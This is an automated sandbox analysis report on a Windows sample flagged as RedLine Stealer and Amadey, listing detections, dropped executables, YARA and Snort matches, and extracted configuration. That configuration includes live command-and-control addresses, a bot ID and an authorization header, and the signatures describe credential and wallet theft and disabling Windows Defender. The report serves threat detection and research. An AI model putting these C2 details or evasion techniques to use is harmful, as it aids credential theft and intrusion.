Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
szDGo5lHdI.exe

Overview

General Information

Sample Name:szDGo5lHdI.exe
Original Sample Name:d20ba0ceff50b0a05c84f694e28462aa.exe
Analysis ID:829671
MD5:d20ba0ceff50b0a05c84f694e28462aa
SHA1:c7c3b70840660f8dd81770e3bd5200eb2feda120
SHA256:bfe36fe57256d59f04350be588333d644cf1aac03039d14dfce313aa60d42ced
Tags:exeRedLineStealer
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • szDGo5lHdI.exe (PID: 4688 cmdline: C:\Users\user\Desktop\szDGo5lHdI.exe MD5: D20BA0CEFF50B0A05C84F694E28462AA)
    • kino0095.exe (PID: 5248 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe MD5: 566C1099548DF136503F4DC814D54B17)
      • kino2456.exe (PID: 5212 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe MD5: EBD95183957BECDB18025FC9D553B15E)
        • kino0588.exe (PID: 6088 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe MD5: 54A8FD200F50B6AF0F10CA6EB68471D3)
          • bus9402.exe (PID: 6120 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
          • con1332.exe (PID: 5144 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe MD5: 0B63FCA2981CA840B845011956E212AD)
        • dvL76s65.exe (PID: 1332 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe MD5: C49DABA1E54976E33808914E11DEE05B)
  • rundll32.exe (PID: 4968 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 812 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5892 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about 500$ on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Amadey

{"C2 url": "31.41.244.200/games/category/index.php", "Version": "3.68"}

Threatname: RedLine

{"C2 url": "193.233.20.30:4125", "Bot Id": "relon", "Authorization Header": "17da69809725577b595e217ba006b869"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1a434:$pat14: , CommandLine:
        • 0x134a7:$v2_1: ListOfProcesses
        • 0x13286:$v4_3: base64str
        • 0x13dff:$v4_4: stringKey
        • 0x11b63:$v4_5: BytesToStringConverted
        • 0x10d76:$v4_6: FromBase64
        • 0x12098:$v4_8: procName
        • 0x12811:$v5_5: FileScanning
        • 0x11d6c:$v5_7: RecordHeaderField
        • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
        C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x2d742:$pat14: , CommandLine:
            • 0x1f823:$v2_1: ListOfProcesses
            • 0x1df49:$v4_3: base64str
            • 0x1df08:$v4_4: stringKey
            • 0x1df53:$v4_5: BytesToStringConverted
            • 0x1df3e:$v4_6: FromBase64
            • 0x1f4de:$v4_8: procName
            • 0x1cc30:$v5_5: FileScanning
            • 0x1ce4e:$v5_7: RecordHeaderField
            • 0x1cd80:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
            0000000F.00000003.345188702.0000000002C80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              0000000F.00000003.345188702.0000000002C80000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
              • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
              • 0x700:$s3: 83 EC 38 53 B0 05 88 44 24 2B 88 44 24 2F B0 95 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
              • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
              • 0x1e9d0:$s5: delete[]
              • 0x1de88:$s6: constructor or from DllMain.
              0000000F.00000002.411952742.0000000002C00000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 22 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                15.2.dvL76s65.exe.2cd7c6e.3.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  15.2.dvL76s65.exe.2cd7c6e.3.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x2c85a:$pat14: , CommandLine:
                  • 0x1e93b:$v2_1: ListOfProcesses
                  • 0x1d061:$v4_3: base64str
                  • 0x1d020:$v4_4: stringKey
                  • 0x1d06b:$v4_5: BytesToStringConverted
                  • 0x1d056:$v4_6: FromBase64
                  • 0x1e5f6:$v4_8: procName
                  • 0x1bd48:$v5_5: FileScanning
                  • 0x1bf66:$v5_7: RecordHeaderField
                  • 0x1be98:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                  13.2.con1332.exe.2bf0e67.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    13.2.con1332.exe.2bf0e67.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                    • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                    • 0x1e9d0:$s5: delete[]
                    • 0x1de88:$s6: constructor or from DllMain.
                    13.3.con1332.exe.2c20000.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      Click to see the 37 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.3193.233.20.304970141252043231 03/18/23-20:58:24.653479
                      SID:2043231
                      Source Port:49701
                      Destination Port:4125
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3193.233.20.304970141252043233 03/18/23-20:58:07.054155
                      SID:2043233
                      Source Port:49701
                      Destination Port:4125
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:193.233.20.30192.168.2.34125497012043234 03/18/23-20:58:08.632497
                      SID:2043234
                      Source Port:4125
                      Destination Port:49701
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                      Multi AV Scanner detection for submitted file
                      Source: szDGo5lHdI.exeReversingLabs: Detection: 46%
                      Source: szDGo5lHdI.exeVirustotal: Detection: 44%Perma Link
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exeVirustotal: Detection: 79%Perma Link
                      Machine Learning detection for sample
                      Source: szDGo5lHdI.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeJoe Sandbox ML: detected
                      Source: 00000001.00000003.261924931.0000000004C7C000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "193.233.20.30:4125", "Bot Id": "relon", "Authorization Header": "17da69809725577b595e217ba006b869"}
                      Source: 0.3.szDGo5lHdI.exe.6f26a20.1.unpackMalware Configuration Extractor: Amadey {"C2 url": "31.41.244.200/games/category/index.php", "Version": "3.68"}
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_00402F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00402F1D
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeCode function: 1_2_010B2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_010B2F1D
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeCode function: 2_2_00962F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_00962F1D
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeCode function: 3_2_00192F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,3_2_00192F1D

                      Compliance

                      barindex
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeUnpacked PE file: 0.2.szDGo5lHdI.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeUnpacked PE file: 13.2.con1332.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeUnpacked PE file: 15.2.dvL76s65.exe.400000.0.unpack
                      Source: szDGo5lHdI.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: Binary string: wextract.pdb source: szDGo5lHdI.exe, szDGo5lHdI.exe, 00000000.00000003.260695646.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, szDGo5lHdI.exe, 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kino0095.exe, kino0095.exe, 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, kino0095.exe, 00000001.00000003.261924931.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, kino2456.exe, kino2456.exe, 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, kino2456.exe, 00000002.00000003.263295160.0000000004E98000.00000004.00000020.00020000.00000000.sdmp, kino0588.exe, kino0588.exe, 00000003.00000000.263688959.0000000000191000.00000020.00000001.01000000.00000006.sdmp, kino0095.exe.0.dr, kino2456.exe.1.dr, kino0588.exe.2.dr
                      Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: szDGo5lHdI.exe, 00000000.00000003.260924559.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, szDGo5lHdI.exe, 00000000.00000003.260695646.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, ge821663.exe.0.dr
                      Source: Binary string: Healer.pdb source: con1332.exe, 0000000D.00000002.329988354.0000000007090000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000002.328962587.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328663106.00000000046D0000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000003.302691147.0000000002E44000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328754727.0000000004750000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wextract.pdbGCTL source: szDGo5lHdI.exe, 00000000.00000003.260695646.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, szDGo5lHdI.exe, 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kino0095.exe, 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, kino0095.exe, 00000001.00000003.261924931.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, kino2456.exe, 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, kino2456.exe, 00000002.00000003.263295160.0000000004E98000.00000004.00000020.00020000.00000000.sdmp, kino0588.exe, 00000003.00000000.263688959.0000000000191000.00000020.00000001.01000000.00000006.sdmp, kino0095.exe.0.dr, kino2456.exe.1.dr, kino0588.exe.2.dr
                      Source: Binary string: <C:\zarepot\talotoyuy1\guf.pdb source: kino2456.exe, 00000002.00000003.263295160.0000000004E98000.00000004.00000020.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000000.331145914.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, dvL76s65.exe.2.dr
                      Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: kino0588.exe, 00000003.00000003.264209575.00000000043E1000.00000004.00000020.00020000.00000000.sdmp, bus9402.exe, 00000004.00000000.264403832.00000000004D2000.00000002.00000001.01000000.00000007.sdmp, bus9402.exe.3.dr
                      Source: Binary string: C:\tugiwozexe-hon68\xozutuboreja.pdb source: kino0588.exe, 00000003.00000003.264209575.00000000043E1000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000000.300762945.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, con1332.exe.3.dr
                      Source: Binary string: _.pdb source: con1332.exe, 0000000D.00000002.328304640.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000003.304290466.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328962587.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328663106.00000000046D0000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000003.302691147.0000000002E44000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328754727.0000000004750000.00000004.00000020.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, dvL76s65.exe, 0000000F.00000003.346294709.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\zarepot\talotoyuy1\guf.pdb source: kino2456.exe, 00000002.00000003.263295160.0000000004E98000.00000004.00000020.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000000.331145914.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, dvL76s65.exe.2.dr
                      Source: Binary string: C:\sigizecem\xigago\tukonunoz_givizadi\yodawusafix\11\j.pdb source: szDGo5lHdI.exe
                      Source: Binary string: Healer.pdbH5 source: con1332.exe, 0000000D.00000002.329988354.0000000007090000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000002.328962587.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328663106.00000000046D0000.00000004.08000000.00040000.00000000.sdmp, con1332.exe, 0000000D.00000003.302691147.0000000002E44000.00000004.00000020.00020000.00000000.sdmp, con1332.exe, 0000000D.00000002.328754727.0000000004750000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_00402390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00402390
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeCode function: 1_2_010B2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_010B2390
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeCode function: 2_2_00962390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00962390
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeCode function: 3_2_00192390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_00192390

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49701 -> 193.233.20.30:4125
                      Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49701 -> 193.233.20.30:4125
                      Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.30:4125 -> 192.168.2.3:49701
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 31.41.244.200/games/category/index.php
                      Source: Malware configuration extractorURLs: 193.233.20.30:4125
                      Source: Joe Sandbox ViewASN Name: REDCOM-ASRedcomKhabarovskRussiaRU REDCOM-ASRedcomKhabarovskRussiaRU
                      Source: Joe Sandbox ViewIP Address: 193.233.20.30 193.233.20.30
                      Source: global trafficTCP traffic: 192.168.2.3:49701 -> 193.233.20.30:4125
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
